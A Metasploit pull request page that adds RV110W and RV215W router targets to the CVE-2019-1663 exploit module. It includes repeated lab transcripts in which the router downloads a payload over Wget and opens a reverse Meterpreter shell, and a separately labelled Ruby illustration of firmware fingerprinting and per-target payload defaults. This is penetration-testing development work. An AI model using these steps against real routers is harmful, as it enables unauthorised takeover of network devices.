
CVE-2019-1663 - Add support for RV110W and RV215W models. #12133

Merged
merged 8 commits into from Aug 30, 2019

Conversation

@QKaiser
Contributor

commented Jul 27, 2019

This pull request adds support for the Cisco RV110W and RV215W models, which are affected by the same issue as the RV130 (CVE-2019-1663).

I wrote a check function that fingerprints firmware versions based on a file that is available to unauthenticated users. This is the best method I could find, given that the httpd server does not leak information through headers. If you can think of a better method, let me know :)

I used the existing deprecation method, given that #12027 hasn't landed yet. I'll let @wvu-r7 refactor the module with the proper deprecation method when it lands.

One open question is whether it is possible to set a default payload based on the chosen target, so that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Verification

Cisco RV110W (firmware version 1.1.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.1.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 0
target => 0
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/Oeg2hQAjOd
[*] Client 192.168.1.1 (Wget) requested /Oeg2hQAjOd
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:40785) at 2019-07-18 21:25:56 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 1381 created.
Channel 1 created.
nvram get fw_version
1.1.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.9)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.9
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 1
target => 1
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/E8DN5bSj5D
[*] Client 192.168.1.1 (Wget) requested /E8DN5bSj5D
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:47864) at 2019-07-18 21:11:05 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 472 created.
Channel 1 created.
nvram get fw_version
1.2.0.9
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.0.10)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.0.10
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 2
target => 2
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/4VFaoatLb
[*] Client 192.168.1.1 (Wget) requested /4VFaoatLb
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 9 opened (192.168.1.100:4444 -> 192.168.1.1:35866) at 2019-07-18 20:58:33 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 544 created.
Channel 1 created.
nvram get fw_version
1.2.0.10
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 9 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.4)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 3
target => 3
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/2nlTdxRvlLf
[*] Client 192.168.1.1 (Wget) requested /2nlTdxRvlLf
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 6 opened (192.168.1.100:4444 -> 192.168.1.1:49181) at 2019-07-18 19:26:06 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 520 created.
Channel 1 created.
nvram get fw_version
1.2.1.4
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 6 closed.  Reason: User exit

Cisco RV110W (firmware version 1.2.1.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 4
target => 4
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/9f1U7su
[*] Client 192.168.1.1 (Wget) requested /9f1U7su
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 4 opened (192.168.1.100:4444 -> 192.168.1.1:60217) at 2019-07-18 19:16:04 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 694 created.
Channel 1 created.
nvram get fw_version
1.2.1.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 4 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.5)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.5
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 6
target => 6
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/g4KoWbXVnJ
[*] Local IP: http://192.168.1.100:8080/g4KoWbXVnJ
[*] Client 192.168.1.1 (Wget) requested /g4KoWbXVnJ
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 16 opened (192.168.1.100:4444 -> 192.168.1.1:37543) at 2019-07-26 15:48:47 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 782 created.
Channel 1 created.
nvram get fw_version
1.1.0.5
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 16 closed.  Reason: User exit

Cisco RV215W (firmware version 1.1.0.6)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.1.0.6
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 7
target => 7
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/ubI9mgBj
[*] Local IP: http://192.168.1.100:8080/ubI9mgBj
[*] Client 192.168.1.1 (Wget) requested /ubI9mgBj
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 14 opened (192.168.1.100:4444 -> 192.168.1.1:34516) at 2019-07-26 15:42:11 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 754 created.
Channel 1 created.
nvram get fw_version
1.1.0.6
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 14 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.14)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 8
target => 8
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Fv3IrUrcS5Xb37
[*] Local IP: http://192.168.1.100:8080/Fv3IrUrcS5Xb37
[*] Client 192.168.1.1 (Wget) requested /Fv3IrUrcS5Xb37
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 12 opened (192.168.1.100:4444 -> 192.168.1.1:56255) at 2019-07-26 15:35:54 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 730 created.
Channel 1 created.
nvram get fw_version
1.2.0.14
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 12 closed.  Reason: User exit

Cisco RV215W (firmware version 1.2.0.15)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.2.0.14 or 1.2.0.15
[+] 192.168.1.1:443 - The target is vulnerable.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > set target 9
target => 9
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/5JDmdNNlZSjCO
[*] Local IP: http://192.168.1.100:8080/5JDmdNNlZSjCO
[*] Client 192.168.1.1 (Wget) requested /5JDmdNNlZSjCO
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 10 opened (192.168.1.100:4444 -> 192.168.1.1:49636) at 2019-07-26 15:29:18 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 807 created.
Channel 1 created.
nvram get fw_version
1.2.0.15
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 10 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.7)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/Ulsp7WNdRpwoJA
[*] Local IP: http://192.168.1.100:8080/Ulsp7WNdRpwoJA
[*] Client 192.168.1.1 (Wget) requested /Ulsp7WNdRpwoJA
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.1:56965) at 2019-07-26 15:15:14 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 792 created.
Channel 1 created.
nvram get fw_version
1.3.0.7
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

Cisco RV215W (firmware version 1.3.0.8)

msf5 exploit(linux/http/cisco_rv130_rmi_rce) > check
[+] Successfully identified device: Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)
[*] 192.168.1.1:443 - Cannot reliably check exploitability.
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] Sending request
[*] Using URL: http://0.0.0.0:8080/hdtlzE
[*] Local IP: http://192.168.1.100:8080/hdtlzE
[*] Client 192.168.1.1 (Wget) requested /hdtlzE
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.1:34656) at 2019-07-26 14:58:59 +0200
[*] Reloading httpd service
[*] Command Stager progress - 100.00% done (112/112 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.22)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter > shell
Process 770 created.
Channel 1 created.
nvraw get fw_version
/bin/sh: nvraw: not found
nvram get fw_version
1.3.0.8
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.1 - Meterpreter session 5 closed.  Reason: User exit

@bcoles bcoles added the module label Jul 27, 2019

@wvu-r7 wvu-r7 self-assigned this Jul 28, 2019

@wvu-r7

Contributor

commented Aug 1, 2019

Hi, @QKaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

One open question is whether it is possible to set a default payload based on the chosen target, so that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Yep! You can set DefaultOptions as per #10471.
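
The following is an added illustration, not code from this pull request or from the Metasploit module it modifies, of the two points raised in this thread: the hash-based fingerprint check from the description above, which can only narrow some devices to a set of firmware versions, and the per-target DefaultOptions mechanism wvu-r7 points to. The file contents, the resulting hashes, the target ordering and the extra "build E" group for the fixed 1.3.1.x RV215W firmware are constructed for the example; the vulnerable and not-vulnerable version lists are the ones the check output above reports.

```ruby
require 'digest'

# Vulnerable firmware versions per model, as reported by the check output in
# the pull request description. Versions absent here are treated as fixed.
VULNERABLE = {
  'RV110W' => %w[1.1.0.9 1.2.0.9 1.2.0.10 1.2.1.4 1.2.1.7],
  'RV215W' => %w[1.1.0.5 1.1.0.6 1.2.0.14 1.2.0.15 1.3.0.7 1.3.0.8]
}.freeze

# Constructed stand-ins for the unauthenticated file the check fetches. Builds
# that ship a byte-identical file collapse onto one hash, which is why some
# devices can only be narrowed to a set of versions. Build E is a constructed
# all-fixed group so the :safe path can be exercised.
SAMPLE_FILES = {
  'RV110W' => {
    %w[1.2.0.10] => "constructed rv110w file, build A\n",
    %w[1.2.1.4 1.2.1.7 1.2.2.1 1.2.2.4] => "constructed rv110w file, build B\n"
  },
  'RV215W' => {
    %w[1.2.0.14 1.2.0.15] => "constructed rv215w file, build C\n",
    %w[1.3.0.7 1.3.0.8 1.3.1.1 1.3.1.4] => "constructed rv215w file, build D\n",
    %w[1.3.1.1 1.3.1.4] => "constructed rv215w file, build E\n"
  }
}.freeze

# SHA-256 of each sample file -> { model:, versions: }. A real module would
# carry precomputed hashes taken from extracted firmware images.
FINGERPRINTS = SAMPLE_FILES.each_with_object({}) do |(model, builds), table|
  builds.each do |versions, body|
    table[Digest::SHA256.hexdigest(body)] = { model: model, versions: versions }
  end
end.freeze

# Targets in the shape Metasploit uses for per-target DefaultOptions; the
# ordering here is an assumption, not the module's. RV130W is ARM, the two
# new models are little-endian MIPS, so the default payload follows the target.
def mips_target(model, version)
  { 'Name' => "Cisco #{model} #{version}", 'Arch' => 'mipsle',
    'Model' => model, 'Version' => version,
    'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp' } }
end

TARGETS = ([
  { 'Name' => 'Cisco RV130W', 'Arch' => 'armle', 'Model' => 'RV130W',
    'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' } }
] + VULNERABLE.flat_map { |model, vs| vs.map { |v| mips_target(model, v) } }).freeze

# Returns [code, description], mirroring Msf::Exploit::CheckCode semantics:
# :vulnerable when every candidate version is affected, :safe when none is,
# :detected when the candidates are mixed (the module then prints "Cannot
# reliably check exploitability"), :unknown when the hash is not in the table.
def check(file_body)
  entry = FINGERPRINTS[Digest::SHA256.hexdigest(file_body)]
  return [:unknown, 'Could not identify device from fingerprint file'] unless entry

  affected = VULNERABLE.fetch(entry[:model], [])
  labels = entry[:versions].map { |v| affected.include?(v) ? v : "#{v} (not vulnerable)" }
  hits = entry[:versions].count { |v| affected.include?(v) }
  code = if hits == entry[:versions].size then :vulnerable
         elsif hits.zero? then :safe
         else :detected
         end
  [code, "Cisco #{entry[:model]} #{labels.join(', ')}"]
end

# Index of the target whose default payload fits the identified build; a
# target without a 'Version' (RV130W here) matches any version of its model.
# Returns nil for a version that has no exploitable target.
def target_for(model, version = nil)
  TARGETS.index { |t| t['Model'] == model && (t['Version'].nil? || t['Version'] == version) }
end

def default_payload(target_index)
  TARGETS[target_index]['DefaultOptions']['PAYLOAD']
end

if $PROGRAM_NAME == __FILE__
  SAMPLE_FILES.each_value do |builds|
    builds.each_value do |body|
      code, desc = check(body)
      puts "#{code.to_s.ljust(10)} #{desc}"
    end
  end
  idx = target_for('RV110W', '1.2.0.10')
  puts "target #{idx} (#{TARGETS[idx]['Name']}) -> #{default_payload(idx)}"
end
```

The point of the three-way result is operational: a :detected answer tells the operator the device is one of several builds, only some of which are exploitable, so running the exploit is a judgement call rather than a sure thing, exactly the situation the 1.2.1.x and 1.3.0.x transcripts above show.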

@QKaiser

Contributor Author

commented Aug 2, 2019

Hi, @QKaiser. I probably won't be able to get the new devices to test, so I'm relying on you for that. :)

Thanks for trusting me with this.

One open question is whether it is possible to set a default payload based on the chosen target, so that it uses linux/armle/meterpreter_reverse_tcp for RV130 and linux/mipsle/meterpreter_reverse_tcp for RV110W/RV215W.

Yep! You can set DefaultOptions as per #10471.

Great ! I just did that in the latest commit.

@wvu-r7 wvu-r7 referenced this pull request Aug 22, 2019
@wvu-r7

Contributor

commented Aug 22, 2019

I'll get this updated with #12223 once that lands, then I'll land this.

@wvu-r7

Contributor

commented Aug 30, 2019

@QKaiser: Hey, #12223 landed, and I've refactored deprecation here. Just waiting on tests to pass, and then I'll land this!

wvu-r7 added a commit that referenced this pull request Aug 30, 2019

@wvu-r7 wvu-r7 merged commit b0b7289 into rapid7:master Aug 30, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
Metasploit Automation - Test Execution: Successfully completed all tests.
continuous-integration/travis-ci/pr: The Travis CI build passed
@wvu-r7

Contributor

commented Aug 30, 2019

Release Notes

The exploit/linux/http/cisco_rv130_rmi_rce module has been moved to exploit/linux/http/cve_2019_1663_cisco_rmi_rce. Targets have also been added for RV110W and RV215W.

jmartin-r7 added a commit that referenced this pull request Aug 30, 2019